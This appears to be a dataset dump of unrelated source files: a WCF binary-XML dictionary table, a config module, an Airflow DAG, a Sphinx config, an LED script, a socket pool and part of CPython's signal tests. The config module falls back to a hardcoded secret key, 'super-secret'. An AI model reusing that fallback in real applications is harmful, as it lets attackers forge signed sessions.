0x1E2: "http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce",
0x1E4: "RenewTarget",
0x1E6: "CancelTarget",
0x1E8: "RequestedTokenCancelled",
0x1EA: "RequestedAttachedReference",
0x1EC: "RequestedUnattachedReference",
0x1EE: "IssuedTokens",
0x1F0: "http://schemas.xmlsoap.org/ws/2005/02/trust/Renew",
0x1F2: "http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel",
0x1F4: "http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey",
0x1F6: "Access",
0x1F8: "AccessDecision",
0x1FA: "Advice",
0x1FC: "AssertionID",
0x1FE: "AssertionIDReference",
0x200: "Attribute",
0x202: "AttributeName",
0x204: "AttributeNamespace",
0x206: "AttributeStatement",
0x208: "AttributeValue",
0x20A: "Audience",
0x20C: "AudienceRestrictionCondition",
0x20E: "AuthenticationInstant",
0x210: "AuthenticationMethod",
0x212: "AuthenticationStatement",
0x214: "AuthorityBinding",
0x216: "AuthorityKind",
0x218: "AuthorizationDecisionStatement",
0x21A: "Binding",
0x21C: "Condition",
0x21E: "Conditions",
0x220: "Decision",
0x222: "DoNotCacheCondition",
0x224: "Evidence",
0x226: "IssueInstant",
0x228: "Issuer",
0x22A: "Location",
0x22C: "MajorVersion",
0x22E: "MinorVersion",
0x230: "NameIdentifier",
0x232: "Format",
0x234: "NameQualifier",
0x236: "Namespace",
0x238: "NotBefore",
0x23A: "NotOnOrAfter",
0x23C: "saml",
0x23E: "Statement",
0x240: "Subject",
0x242: "SubjectConfirmation",
0x244: "SubjectConfirmationData",
0x246: "ConfirmationMethod",
0x248: "urn:oasis:names:tc:SAML:1.0:cm:holder-of-key",
0x24A: "urn:oasis:names:tc:SAML:1.0:cm:sender-vouches",
0x24C: "SubjectLocality",
0x24E: "DNSAddress",
0x250: "IPAddress",
0x252: "SubjectStatement",
0x254: "urn:oasis:names:tc:SAML:1.0:am:unspecified",
0x256: "xmlns",
0x258: "Resource",
0x25A: "UserName",
0x25C: "urn:oasis:names:tc:SAML:1.1:nameid-format:WindowsDomainQualifiedName",
0x25E: "EmailName",
0x260: "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress",
0x262: "u",
0x264: "ChannelInstance",
0x266: "http://schemas.microsoft.com/ws/2005/02/duplex",
0x268: "Encoding",
0x26A: "MimeType",
0x26C: "CarriedKeyName",
0x26E: "Recipient",
0x270: "EncryptedKey",
0x272: "KeyReference",
0x274: "e",
0x276: "http://www.w3.org/2001/04/xmlenc#Element",
0x278: "http://www.w3.org/2001/04/xmlenc#Content",
0x27A: "KeyName",
0x27C: "MgmtData",
0x27E: "KeyValue",
0x280: "RSAKeyValue",
0x282: "Modulus",
0x284: "Exponent",
0x286: "X509Data",
0x288: "X509IssuerSerial",
0x28A: "X509IssuerName",
0x28C: "X509SerialNumber",
0x28E: "X509Certificate",
0x290: "AckRequested",
0x292: "http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested",
0x294: "AcksTo",
0x296: "Accept",
0x298: "CreateSequence",
0x29A: "http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence",
0x29C: "CreateSequenceRefused",
0x29E: "CreateSequenceResponse",
0x2A0: "http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse",
0x2A2: "FaultCode",
0x2A4: "InvalidAcknowledgement",
0x2A6: "LastMessage",
0x2A8: "http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage",
0x2AA: "LastMessageNumberExceeded",
0x2AC: "MessageNumberRollover",
0x2AE: "Nack",
0x2B0: "netrm",
0x2B2: "Offer",
0x2B4: "r",
0x2B6: "SequenceFault",
0x2B8: "SequenceTerminated",
0x2BA: "TerminateSequence",
0x2BC: "http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence",
0x2BE: "UnknownSequence",
0x2C0: "http://schemas.microsoft.com/ws/2006/02/tx/oletx",
0x2C2: "oletx",
0x2C4: "OleTxTransaction",
0x2C6: "PropagationToken",
0x2C8: "http://schemas.xmlsoap.org/ws/2004/10/wscoor",
0x2CA: "wscoor",
0x2CC: "CreateCoordinationContext",
0x2CE: "CreateCoordinationContextResponse",
0x2D0: "CoordinationContext",
0x2D2: "CurrentContext",
0x2D4: "CoordinationType",
0x2D6: "RegistrationService",
0x2D8: "Register",
0x2DA: "RegisterResponse",
0x2DC: "ProtocolIdentifier",
0x2DE: "CoordinatorProtocolService",
0x2E0: "ParticipantProtocolService",
0x2E2: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext",
0x2E4: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse",
0x2E6: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register",
0x2E8: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse",
0x2EA: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault",
0x2EC: "ActivationCoordinatorPortType",
0x2EE: "RegistrationCoordinatorPortType",
0x2F0: "InvalidState",
0x2F2: "InvalidProtocol",
0x2F4: "InvalidParameters",
0x2F6: "NoActivity",
0x2F8: "ContextRefused",
0x2FA: "AlreadyRegistered",
0x2FC: "http://schemas.xmlsoap.org/ws/2004/10/wsat",
0x2FE: "wsat",
0x300: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion",
0x302: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC",
0x304: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC",
0x306: "Prepare",
0x308: "Prepared",
0x30A: "ReadOnly",
0x30C: "Commit",
0x30E: "Rollback",
0x310: "Committed",
0x312: "Aborted",
0x314: "Replay",
0x316: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit",
0x318: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback",
0x31A: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed",
0x31C: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted",
0x31E: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare",
0x320: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared",
0x322: "http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly",
0x324: "http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay",
0x326: "http://schemas.xmlsoap.org/ws/2004/10/wsat/fault",
0x328: "CompletionCoordinatorPortType",
0x32A: "CompletionParticipantPortType",
0x32C: "CoordinatorPortType",
0x32E: "ParticipantPortType",
0x330: "InconsistentInternalState",
0x332: "mstx",
0x334: "Enlistment",
0x336: "protocol",
0x338: "LocalTransactionId",
0x33A: "IsolationLevel",
0x33C: "IsolationFlags",
0x33E: "Description",
0x340: "Loopback",
0x342: "RegisterInfo",
0x344: "ContextId",
0x346: "TokenId",
0x348: "AccessDenied",
0x34A: "InvalidPolicy",
0x34C: "CoordinatorRegistrationFailed",
0x34E: "TooManyEnlistments",
0x350: "Disabled",
0x352: "ActivityId",
0x354: "http://schemas.microsoft.com/2004/09/ServiceModel/Diagnostics",
0x356: "http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1",
0x358: "http://schemas.xmlsoap.org/ws/2002/12/policy",
0x35A: "FloodMessage",
0x35C: "LinkUtility",
0x35E: "Hops",
0x360: "http://schemas.microsoft.com/net/2006/05/peer/HopCount",
0x362: "PeerVia",
0x364: "http://schemas.microsoft.com/net/2006/05/peer",
0x366: "PeerFlooder",
0x368: "PeerTo",
0x36A: "http://schemas.microsoft.com/ws/2005/05/routing",
0x36C: "PacketRoutable",
0x36E: "http://schemas.microsoft.com/ws/2005/05/addressing/none",
0x370: "http://schemas.microsoft.com/ws/2005/05/envelope/none",
0x372: "http://www.w3.org/2001/XMLSchema-instance",
0x374: "http://www.w3.org/2001/XMLSchema",
0x376: "nil",
0x378: "type",
0x37A: "char",
0x37C: "boolean",
0x37E: "byte",
0x380: "unsignedByte",
0x382: "short",
0x384: "unsignedShort",
0x386: "int",
0x388: "unsignedInt",
0x38A: "long",
0x38C: "unsignedLong",
0x38E: "float",
0x390: "double",
0x392: "decimal",
0x394: "dateTime",
0x396: "string",
0x398: "base64Binary",
0x39A: "anyType",
0x39C: "duration",
0x39E: "guid",
0x3A0: "anyURI",
0x3A2: "QName",
0x3A4: "time",
0x3A6: "date",
0x3A8: "hexBinary",
0x3AA: "gYearMonth",
0x3AC: "gYear",
0x3AE: "gMonthDay",
0x3B0: "gDay",
0x3B2: "gMonth",
0x3B4: "integer",
0x3B6: "positiveInteger",
0x3B8: "negativeInteger",
0x3BA: "nonPositiveInteger",
0x3BC: "nonNegativeInteger",
0x3BE: "normalizedString",
0x3C0: "ConnectionLimitReached",
0x3C2: "http://schemas.xmlsoap.org/soap/envelope/",
0x3C4: "actor",
0x3C6: "faultcode",
0x3C8: "faultstring",
0x3CA: "faultactor",
0x3CC: "detail",
}
inverted_dict = dict([(v, k) for (k, v) in dictionary.items()])
| 39.398077 | 117 | 0.667496 |
4a1b44c80a7838e89c0d8a8043667dc1f424644b
| 149 |
py
|
Python
|
config.py
|
robk-dev/bunnies
|
6116f7ee8496c582422370a68f99707f46071ce7
|
[
"MIT"
] | null | null | null |
config.py
|
robk-dev/bunnies
|
6116f7ee8496c582422370a68f99707f46071ce7
|
[
"MIT"
] | null | null | null |
config.py
|
robk-dev/bunnies
|
6116f7ee8496c582422370a68f99707f46071ce7
|
[
"MIT"
] | null | null | null |
import os
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'super-secret'
MONGODB_SETTINGS = { 'db': 'bunnies' }
| 21.285714 | 63 | 0.637584 |
4a1b45b15c81e790ad41960a6fbc3d5459341b92
| 1,406 |
py
|
Python
|
examples/src/dbnd_examples/dbnd_airflow/scheduled_dbnd_check.py
|
turbaszek/dbnd
|
6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0
|
[
"Apache-2.0"
] | null | null | null |
examples/src/dbnd_examples/dbnd_airflow/scheduled_dbnd_check.py
|
turbaszek/dbnd
|
6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0
|
[
"Apache-2.0"
] | null | null | null |
examples/src/dbnd_examples/dbnd_airflow/scheduled_dbnd_check.py
|
turbaszek/dbnd
|
6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0
|
[
"Apache-2.0"
] | null | null | null |
"""
Code that goes along with the Airflow tutorial located at:
https://github.com/airbnb/airflow/blob/master/airflow/example_dags/tutorial.py
"""
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from dbnd.tasks.basics import dbnd_sanity_check
from dbnd_airflow_operator.dbnd_cmd_operators import dbnd_task_as_bash_operator
default_args = {
"owner": "airflow",
"depends_on_past": False,
"start_date": datetime.now(),
"schedule_interval": timedelta(minutes=1),
"email": ["airflow@example.com"],
"email_on_failure": False,
"email_on_retry": False,
"retries": 1,
"retry_delay": timedelta(minutes=5),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
}
with DAG("scheduled_dbnd_check", default_args=default_args) as dag:
templated_command = (
"dbnd run dbnd_sanity_check --task-target-date {{ ds }} "
"--name {{ params.my_param }}"
)
BashOperator(
task_id="run_dbnd_check",
bash_command=templated_command,
params={"my_param": "name_from_params"},
dag=dag,
)
every_minute = dbnd_task_as_bash_operator(
dbnd_sanity_check,
name="dbnd_check_every_minute",
schedule_interval=timedelta(minutes=2),
default_args=default_args,
)
print(every_minute)
| 28.12 | 79 | 0.70128 |
4a1b468feda12882dbb000cd1f91567ff4924e26
| 8,290 |
py
|
Python
|
doc/conf.py
|
nwu63/pyhyp
|
d29715f509c7c460d6705183301eda14da217755
|
[
"Apache-2.0"
] | null | null | null |
doc/conf.py
|
nwu63/pyhyp
|
d29715f509c7c460d6705183301eda14da217755
|
[
"Apache-2.0"
] | null | null | null |
doc/conf.py
|
nwu63/pyhyp
|
d29715f509c7c460d6705183301eda14da217755
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# pyHyp documentation build configuration file, created by
# sphinx-quickstart on Sun Oct 13 13:46:01 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../python'))
#sys.path.insert(0, os.path.abspath('./fort_py_doc'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx',
'sphinx.ext.todo', 'sphinx.ext.coverage',
'sphinx.ext.pngmath', 'sphinx.ext.viewcode']#,'numpydoc']
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pyHyp'
copyright = u'2013, Dr. Gaetan Kenway'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'development'
# The full version, including alpha/beta/rc tags.
release = 'development'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'sphinx'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['themes']
html_theme = 'mdolab_theme'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyHypdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pyHyp.tex', u'pyHyp Documentation',
u'Dr. Gaetan Kenway', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyhyp', u'pyHyp Documentation',
[u'Dr. Gaetan Kenway'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyHyp', u'pyHyp Documentation',
u'Dr. Gaetan Kenway', 'pyHyp', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
## fortran_src = ['../src/modules/hypData.F90','../src/3D/3D_code.F90']
# fortran_src = ['../src/3D/3D_code.F90']
# fortran_ext = ['.F90']
| 32.382813 | 80 | 0.710615 |
4a1b471e07d2e24dfc4c2f1555b8f4412fd44d90
| 731 |
py
|
Python
|
breathe.py
|
electric-blue-green/trinket
|
82e1e265934252c0cf3b2fa72f9bc1d60a35ac93
|
[
"Unlicense"
] | 1 |
2021-06-05T03:12:36.000Z
|
2021-06-05T03:12:36.000Z
|
breathe.py
|
aejb/trinket
|
82e1e265934252c0cf3b2fa72f9bc1d60a35ac93
|
[
"Unlicense"
] | 1 |
2018-02-26T11:22:50.000Z
|
2018-02-26T11:22:50.000Z
|
breathe.py
|
electric-blue-green/trinket
|
82e1e265934252c0cf3b2fa72f9bc1d60a35ac93
|
[
"Unlicense"
] | null | null | null |
import board
import busio
import time
dotstar = busio.SPI(board.APA102_SCK, board.APA102_MOSI)
colors = [0, 0, 0]
print("INIT") ## REPL
def setPixel(red, green, blue):
if not dotstar.try_lock():
return
#print("setting pixel to: %d %d %d" % (red, green, blue))
dotstar.write(bytearray([0x00, 0x00, 0x00, 0x00, 0xff, blue, green, red, 0xff, 0xff, 0xff, 0xff]))
dotstar.unlock()
time.sleep(0.01)
while True:
for i in range(0,255):
colors[1] += 1
print(colors)
time.sleep(0.01)
setPixel(colors[0], colors[1], colors[2])
for i in range(255,0,-1):
colors[1] -= 1
print(colors)
time.sleep(0.03)
setPixel(colors[0], colors[1], colors[2])
| 28.115385 | 102 | 0.597811 |
4a1b48853d3f335a9c96cdafd48519f4b31d2ac0
| 413 |
py
|
Python
|
src/sima/riflex/hydrodynamicinputcode.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/riflex/hydrodynamicinputcode.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/riflex/hydrodynamicinputcode.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
# Generated with HydrodynamicInputCode
#
from enum import Enum
from enum import auto
class HydrodynamicInputCode(Enum):
""""""
DIMENSIONAL = auto()
NONDIMENSIONAL = auto()
def label(self):
if self == HydrodynamicInputCode.DIMENSIONAL:
return "Dimensional coefficients"
if self == HydrodynamicInputCode.NONDIMENSIONAL:
return "Nondimensional coefficients"
| 27.533333 | 56 | 0.690073 |
4a1b489aa6a453aebba6d32349e866ec473d2d09
| 8,459 |
py
|
Python
|
src/socketclient/SocketPool.py
|
TKaxv-7S/jd-assistant
|
426940efa4254246e9eb85e32fc81f8b3728f323
|
[
"MIT"
] | 16 |
2020-12-17T11:19:38.000Z
|
2022-02-17T06:03:34.000Z
|
src/socketclient/SocketPool.py
|
JackMa777/jd-assistant
|
426940efa4254246e9eb85e32fc81f8b3728f323
|
[
"MIT"
] | null | null | null |
src/socketclient/SocketPool.py
|
JackMa777/jd-assistant
|
426940efa4254246e9eb85e32fc81f8b3728f323
|
[
"MIT"
] | 4 |
2020-12-04T05:06:14.000Z
|
2021-12-28T09:03:24.000Z
|
# -*- coding: utf-8 -
import time
from socketclient.Connector import Connector
from socketclient.log import logger
class SocketPool(object):
"""Pool of socket connections"""
def __init__(self, conn_factory, backend_mod=None,
host=None, port=80, active_count=3, max_count=10):
self.conn_factory = conn_factory
self.host = host
self.port = port
self.active_count = active_count
self.max_count = max_count
self.backend_mod = backend_mod
self.import_queue = getattr(backend_mod, 'queue')
self.pool = self.import_queue.Queue(max_count)
for i in range(active_count):
try:
new_connect = conn_factory(host, port, backend_mod, True)
if new_connect.is_connected():
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
logger.error("队列已满")
break
except Exception as e:
logger.error('新建连接异常,host:%s,port:%s,异常:%s', host, port, e)
static_count = max_count - active_count
if static_count > 0:
for i in range(static_count):
try:
new_connect = conn_factory(host, port, backend_mod)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
logger.error("队列已满")
break
except Exception as e:
logger.error('新建连接异常,host:%s,port:%s,异常:%s', host, port, e)
self.sem = self.backend_mod.Semaphore(1)
# 废弃逻辑
# def is_valid_connect(self, conn: Connector, verify_time=time.time(), verify_interval_time=0):
# if conn.is_connected():
# if conn.is_connecting():
# interval_time = conn.connect_time() + self.life_time - verify_time
# if interval_time > 0:
# if interval_time - verify_interval_time < 0:
# conn.keep_connect(verify_time)
# return True
# else:
# return False
# else:
# return False
# return not conn.is_closed()
@staticmethod
def verify_connect(conn: Connector, verify_time=time.time()):
if not conn:
return False
elif conn.is_valid(verify_time):
return True
else:
conn.invalidate()
return False
def verify_all(self):
active_count = 0
now = time.time()
for i in range(self.max_count):
conn = None
try:
conn = self.pool.get_nowait()
if self.verify_connect(conn, now):
if conn.is_connected():
active_count += 1
elif self.active_count > active_count:
# 根据active_count值保持活跃连接数
conn.connect()
active_count += 1
self.pool.put_nowait(conn)
except self.import_queue.Empty:
break
except self.import_queue.Full:
break
except Exception as e:
logger.error("异常信息:%s", e)
if conn:
conn.invalidate()
# 完成后需要保证队列中有max_count个连接,不够则创建
left_count = self.max_count - self.pool.qsize()
if active_count >= self.active_count:
for i in range(left_count):
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
break
except Exception as e:
logger.error('新建连接异常,host:%s,port:%s,异常:%s', self.host, self.port, e)
else:
left_active_count = self.active_count - active_count
left_static_count = left_count - left_active_count
# 剩余空间足够
if left_static_count >= 0:
for i in range(left_active_count):
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod, True)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
break
except Exception as e:
logger.error('新建连接异常,host:%s,port:%s,异常:%s', self.host, self.port, e)
for i in range(left_static_count):
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
break
except Exception as e:
logger.error('新建连接异常,host:%s,port:%s,异常:%s', self.host, self.port, e)
# else:
# 不应该会出现,否则打印错误日志
# logger.error("队列中没有足够空间创建活动连接")
@property
def size(self):
return self.pool.qsize()
def invalidate_all(self):
if self.pool.qsize():
while True:
try:
self.pool.get_nowait().invalidate()
except self.import_queue.Empty:
break
except Exception as e:
logger.error("异常信息:%s", e)
logger.info("与主机[%s]端口[%s]连接已释放", self.host, self.port)
def put_connect(self, conn: Connector):
if conn.host != self.host or conn.port != self.port:
conn.invalidate()
return False
with self.sem:
if self.pool.qsize() < self.max_count:
if self.verify_connect(conn):
try:
self.pool.put_nowait(conn)
return True
except self.import_queue.Full:
conn.invalidate()
return False
else:
conn.invalidate()
return False
def get_connect(self, host=None, port=80):
size = self.pool.qsize()
if size:
now = time.time()
while True:
try:
conn = self.pool.get_nowait()
if self.verify_connect(conn, now):
return conn
else:
size -= 1
if size <= 0:
break
except self.import_queue.Empty:
return None
except Exception as e:
logger.error("异常信息:%s", e)
size -= 1
if size <= 0:
break
try:
new_item = self.conn_factory(host, port, self.backend_mod)
new_item.connect()
return new_item
except Exception as e:
logger.error("创建连接异常:%s", e)
return None
# else:
# # we should be connected now
# with self.sem:
def connect_all(self):
size = self.pool.qsize()
if size:
while True:
try:
size -= 1
conn = self.pool.get_nowait()
if conn.is_valid():
conn.connect()
self.pool.put_nowait(conn)
else:
conn.invalidate()
if size <= 0:
break
except self.import_queue.Full:
break
except self.import_queue.Empty:
break
except Exception as e:
logger.error("异常信息:%s", e)
for i in range(self.max_count - self.pool.qsize()):
new_connect = None
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod, True)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
if new_connect:
new_connect.invalidate()
break
except Exception as e:
logger.error('新建连接异常:%s', e)
logger.info("与主机[%s]端口[%s]新建[%s]个连接", self.host, self.port, self.pool.qsize())
| 37.264317 | 101 | 0.485991 |
4a1b4a654f7cc3e4a380891359c020f383d8dc57
| 18,855 |
py
|
Python
|
exe/portable-python/App/Lib/test/test_signal.py
|
jaredmusil/iawsc-data-toolbox
|
65b97d45e13813935017f8b3c5726784027b065f
|
[
"MIT"
] | null | null | null |
exe/portable-python/App/Lib/test/test_signal.py
|
jaredmusil/iawsc-data-toolbox
|
65b97d45e13813935017f8b3c5726784027b065f
|
[
"MIT"
] | 1 |
2018-04-15T22:59:15.000Z
|
2018-04-15T22:59:15.000Z
|
exe/portable-python/App/Lib/test/test_signal.py
|
jaredmusil/iawsc-data-toolbox
|
65b97d45e13813935017f8b3c5726784027b065f
|
[
"MIT"
] | null | null | null |
import errno
import gc
import os
import pickle
import select
import signal
import subprocess
import sys
import time
import traceback
import unittest
from test import support
from contextlib import closing
from test.script_helper import assert_python_ok, spawn_python
if sys.platform in ('os2', 'riscos'):
raise unittest.SkipTest("Can't test signal on %s" % sys.platform)
class HandlerBCalled(Exception):
pass
def exit_subprocess():
"""Use os._exit(0) to exit the current subprocess.
Otherwise, the test catches the SystemExit and continues executing
in parallel with the original test, so you wind up with an
exponential number of tests running concurrently.
"""
os._exit(0)
def ignoring_eintr(__func, *args, **kwargs):
try:
return __func(*args, **kwargs)
except EnvironmentError as e:
if e.errno != errno.EINTR:
raise
return None
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class InterProcessSignalTests(unittest.TestCase):
MAX_DURATION = 20 # Entire test should last at most 20 sec.
def setUp(self):
self.using_gc = gc.isenabled()
gc.disable()
def tearDown(self):
if self.using_gc:
gc.enable()
def format_frame(self, frame, limit=None):
return ''.join(traceback.format_stack(frame, limit=limit))
def handlerA(self, signum, frame):
self.a_called = True
if support.verbose:
print("handlerA invoked from signal %s at:\n%s" % (
signum, self.format_frame(frame, limit=1)))
def handlerB(self, signum, frame):
self.b_called = True
if support.verbose:
print ("handlerB invoked from signal %s at:\n%s" % (
signum, self.format_frame(frame, limit=1)))
raise HandlerBCalled(signum, self.format_frame(frame))
def wait(self, child):
"""Wait for child to finish, ignoring EINTR."""
while True:
try:
child.wait()
return
except OSError as e:
if e.errno != errno.EINTR:
raise
def run_test(self):
# Install handlers. This function runs in a sub-process, so we
# don't worry about re-setting the default handlers.
signal.signal(signal.SIGHUP, self.handlerA)
signal.signal(signal.SIGUSR1, self.handlerB)
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
signal.signal(signal.SIGALRM, signal.default_int_handler)
# Variables the signals will modify:
self.a_called = False
self.b_called = False
# Let the sub-processes know who to send signals to.
pid = os.getpid()
if support.verbose:
print("test runner's pid is", pid)
child = ignoring_eintr(subprocess.Popen, ['kill', '-HUP', str(pid)])
if child:
self.wait(child)
if not self.a_called:
time.sleep(1) # Give the signal time to be delivered.
self.assertTrue(self.a_called)
self.assertFalse(self.b_called)
self.a_called = False
# Make sure the signal isn't delivered while the previous
# Popen object is being destroyed, because __del__ swallows
# exceptions.
del child
try:
child = subprocess.Popen(['kill', '-USR1', str(pid)])
# This wait should be interrupted by the signal's exception.
self.wait(child)
time.sleep(1) # Give the signal time to be delivered.
self.fail('HandlerBCalled exception not raised')
except HandlerBCalled:
self.assertTrue(self.b_called)
self.assertFalse(self.a_called)
if support.verbose:
print("HandlerBCalled exception caught")
child = ignoring_eintr(subprocess.Popen, ['kill', '-USR2', str(pid)])
if child:
self.wait(child) # Nothing should happen.
try:
signal.alarm(1)
# The race condition in pause doesn't matter in this case,
# since alarm is going to raise a KeyboardException, which
# will skip the call.
signal.pause()
# But if another signal arrives before the alarm, pause
# may return early.
time.sleep(1)
except KeyboardInterrupt:
if support.verbose:
print("KeyboardInterrupt (the alarm() went off)")
except:
self.fail("Some other exception woke us from pause: %s" %
traceback.format_exc())
else:
self.fail("pause returned of its own accord, and the signal"
" didn't arrive after another second.")
